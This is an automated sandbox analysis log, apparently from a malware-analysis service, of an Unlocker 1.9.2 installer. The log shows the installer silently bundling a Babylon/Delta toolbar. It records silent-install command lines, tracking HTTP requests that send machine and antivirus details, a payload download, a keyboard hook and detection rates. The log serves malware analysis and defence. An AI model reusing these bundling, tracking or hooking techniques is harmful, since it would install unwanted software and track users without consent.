00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=babylon6_full_text
Source: Setup.exe, 00000002.00000002.360676354.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358228779.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358133429.000000000238C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=babylon6_full_texthy
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=getting_started&lang=$
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=machinetrans
Source: Setup.exe, 00000002.00000003.358323085.000000000236F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=machinetrans3
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=post_install_page&lang=$
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358181176.000000000236E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358323085.000000000236F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://www.my-online-search.com&babsrc=SP_ofln&mntrId=&dlb=%d&babsrc=SP_def&NT_HP_TB_SP_My
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/9.2.exerefox
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_def&/?q=
Source: Setup.exe, 00000002.00000002.360644771.0000000002387000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358686150.0000000002386000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357844103.0000000002381000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358551623.000000000237A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357867781.0000000002371000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360615970.000000000237C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358204631.0000000002372000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358754148.000000000237A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=1224711588
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358258275.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471dat
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358258275.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471t
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358258275.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471tml
Source: Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?q=
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://www.my-online-search.comhttp://www.my-online-search.com/?babsrc=HP_ofln&mntrId=&dlb=%dhome&?/
Source: Setup.exe, 00000002.00000002.361089994.00000000037B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknownDNS traffic detected: queries for: stat.info-stream.net
Source: global trafficHTTP traffic detected: GET /report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0 HTTP/1.1User-Agent: BabylonHost: stat.info-stream.netCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /downloader.php?ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&lang=en&zpb=1&geo=1 HTTP/1.1User-Agent: BabylonHost: stp.babylon.comConnection: Keep-AliveCookie: affilID=122471
Source: global trafficHTTP traffic detected: GET /site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb HTTP/1.1User-Agent: BabylonHost: dl.babylon.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&hp=1&dsp=1&tb=1&hpx=0&dspx=0&rvrt=0&excd=0&stm=2&nvs=0&dnld=100&dcnt=1&dtot=1&dlerr=200&dltm=0&dlsz=3844&dsflr=0&errurl=Setup2.zpb&hpc=1998245871&spc=1998245871&tbx=0 HTTP/1.1User-Agent: BabylonHost: stat.info-stream.netCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004C8C80 SetWindowsHookExW 00000002,004C8BE0,00000000,000000002_2_004C8C80
Source: Unlocker1.9.2.exe, 00000000.00000002.373817613.000000000071A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EB9
Source: Unlocker1.9.2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030CB
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_004046CA0_2_004046CA
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00405FA80_2_00405FA8
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeCode function: 1_2_009A31F31_2_009A31F3
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004500152_2_00450015
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_0045832D2_2_0045832D
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004524B02_2_004524B0
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004997402_2_00499740
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: String function: 004CC5C0 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeSection loaded: reslib.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeSection loaded: reslib.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeSection loaded: reslib.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile created: C:\Program Files\Unlocker\UnlockerDriver5.sysJump to behavior
Source: sqlite3.dll.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: sqlite3.dll.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DeltaTB.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9996548694779116
Source: Unlocker1.9.2.exeReversingLabs: Detection: 55%
Source: Unlocker1.9.2.exeVirustotal: Detection: 43%
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeFile read: C:\Users\user\Desktop\Unlocker1.9.2.exeJump to behavior
Source: Unlocker1.9.2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Unlocker1.9.2.exe C:\Users\user\Desktop\Unlocker1.9.2.exe
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess created: C:\Users\user\AppData\Local\Temp\DeltaTB.exe "C:\Users\user\AppData\Local\Temp\DeltaTB.exe" /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeProcess created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe "C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe" -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache URI|http://babylon.com
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\Internet Explorer\IELowutil.exe" -PID:123
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Local\Temp\8A431A~1\IEHelper.dll,UpdateProtectedModeCookieCache trkInfo|http://babylon.com
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exe C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\Setup.exe -latest -trkInfo=[TType:5012_7] -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mnt
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Unlocker\UnlockerCOM.dll
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Unlocker\UnlockerCOM.dll"
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess created: C:\Users\user\AppData\Local\Temp\DeltaTB.exe "C:\Users\user\AppData\Local\Temp\DeltaTB.exe" /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mntJump to behavior
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe" /s "C:\Program Files\Unlocker\UnlockerCOM.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\DeltaTB.exeProcess created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe "C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exe" -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mntJump to behavior
Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\setup.exe C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Latest\Setup.exe -latest -trkInfo=[TType:5012_7] -xprm="cat=delta" -expg=none /aflt=babsst /babTrack="affID=122471" /srcExt=ss /instlRef=sst /S /mtb /mds /mhp /mntJump to behavior
